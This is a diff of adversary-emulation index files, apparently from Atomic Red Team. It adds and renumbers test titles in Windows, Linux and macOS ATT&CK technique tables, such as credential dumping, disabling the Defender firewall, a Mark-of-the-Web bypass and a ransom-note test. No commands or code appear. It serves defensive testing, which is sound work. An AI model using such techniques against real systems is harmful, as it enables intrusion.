+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -359,10 +361,11 @@
   - Atomic Test #4: Clear Windows Audit Policy Config [windows]
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #10: Unload Sysmon Filter Driver [windows]
   - Atomic Test #11: Uninstall Sysmon [windows]
@@ -407,7 +410,7 @@
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
   - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -439,7 +442,9 @@
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
   - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -765,7 +770,8 @@
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1044,7 +1050,8 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
@@ -1111,7 +1118,8 @@
   - Atomic Test #3: Copy and Execute File with PsExec [windows]
   - Atomic Test #4: Execute command writing output to local Admin Share [windows]
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Matrices/linux-matrix.md

@@ -1,16 +1,16 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -26,7 +26,7 @@
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -45,7 +45,7 @@
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Service](../../T1543.002/T1543.002.md) |  | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Timers](../../T1053.006/T1053.006.md) |  | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/macos-matrix.md

@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
